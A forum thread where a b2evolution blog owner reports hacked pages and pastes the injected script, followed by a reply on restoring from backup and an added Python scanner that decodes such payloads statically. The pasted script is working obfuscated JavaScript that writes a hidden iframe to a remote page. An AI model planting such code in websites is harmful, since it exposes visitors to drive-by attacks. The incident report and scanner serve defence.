My b2evolution Version: 1.9.x
Today I noticed that the other day my blog pages changed: index.php, default.php, etc.
A whole bunch of links to www.phpbb.com/phpBB2.old/cache/template/online/ (that don't exist) and a script block:
<script>function v4702fcd4894f2(v4702fcd48a4cf){ function v4702fcd48b4ac () {var v4702fcd48c49e=16; return v4702fcd48c49e;} return(parseInt(v4702fcd48a4cf,v4702fcd48b4ac()));}function v4702fcd48d47c(v4702fcd48e46c){ function v4702fcd4913d9 () {var v4702fcd4923ad=2; return v4702fcd4923ad;} var v4702fcd48f462='';for(v4702fcd490411=0; v4702fcd490411<v4702fcd48e46c.length; v4702fcd490411+=v4702fcd4913d9()){ v4702fcd48f462+=(String.fromCharCode(v4702fcd4894f2(v4702fcd48e46c.substr(v4702fcd490411, v4702fcd4913d9()))));}return v4702fcd48f462;} document.write(v4702fcd48d47c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D63207372633D5C27687474703A2F2F6D792D706167652D64652E696E666F2F696E2E6367693F64656661756C743F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313436313630292B273836665C272077696474683D333438206865696768743D343230207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Obviously I've been hacked, but the last security alert said that 1.9.x was OK???
What's the best way to get things back to normal? Update to 2.x?? (I was planning to, just have not had time yet.)
The other odd thing is that I also run Gallery, which has had its main page deleted. I use links to gallery images in the blog... are these attacks connected, and is there something I can do to help prevent them?
Thanks,
Perry
Perry,
If you've been hacked and you've noticed code/links injected into your b2evo blog pages, you might be interested in reading [url=http://randsco.com/news.php/2007/06/25/west_coast_hacked]THIS[/url], as we were hacked in a similar fashion.
Firstly, it's probably nothing to do with b2evo and more to do with your host provider. Check to see if OTHER FILES have been similarly affected (for us, it was any .php, .html and .htm file). Also, you can use tools to see if OTHER PEOPLE on your HOST'S SERVER are affected (chances are, if your account was hacked, others on the shared server were hacked too ... assuming you're on a shared server).
Our fix was simple.
We contacted our host and requested that our whole site be backed up from the latest backup (about a week old) ... so there wasn't much loss of data.
Hope this helps.
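The check suggested in the reply above (looking through the other .php, .html and .htm files for the same kind of injected block), as an added example that is not part of the original posts: it finds long hex strings passed to a call, as in the posted script, and decodes them statically, without running any JavaScript, to list the hidden iframe sources. The function names, the 40-byte threshold and the `example.invalid` sample are assumptions made for this sketch.

```python
import re
import sys
from pathlib import Path

# File types the reply reports as affected on their site.
EXTENSIONS = {".php", ".html", ".htm"}
# A quoted run of 40+ hex byte pairs used as a call argument (threshold is an assumption).
HEX_ARG = re.compile(r"\(\s*['\"]((?:[0-9A-Fa-f]{2}){40,})['\"]\s*\)")
# src of an iframe inside the decoded text; quotes may be backslash-escaped.
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*\\?['\"]?([^'\"\\\s>]+)", re.I)


def decode_hex_payloads(text):
    """Decode every long hex literal found in text; nothing is executed."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_ARG.finditer(text)]


def scan_tree(root):
    """Map each file holding a hex payload to the iframe sources it decodes to."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        text = path.read_text(encoding="latin-1", errors="replace")
        decoded = decode_hex_payloads(text)
        if decoded:  # an empty URL list still means "review this file by hand"
            findings[str(path)] = [u for d in decoded
                                   for u in IFRAME_SRC.findall(d)]
    return findings


def constructed_sample():
    """Constructed, harmless stand-in for an injected block (not the posted payload)."""
    inner = ("<SCRIPT>document.write('<iframe src=\\'http://example.invalid/in.cgi\\' "
             "style=\\'display: none\\'></iframe>')</SCRIPT>")
    return ("<script>document.write(dec('"
            + inner.encode("latin-1").hex().upper() + "'));</script>")


if __name__ == "__main__":
    # Usage: python scan_injected.py /path/to/webroot
    for name, urls in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, urls or "(hex payload, no iframe found)")
```

A file that appears in the output with an empty list still contains a long hex literal and is worth opening by hand, since legitimate code occasionally carries such strings too.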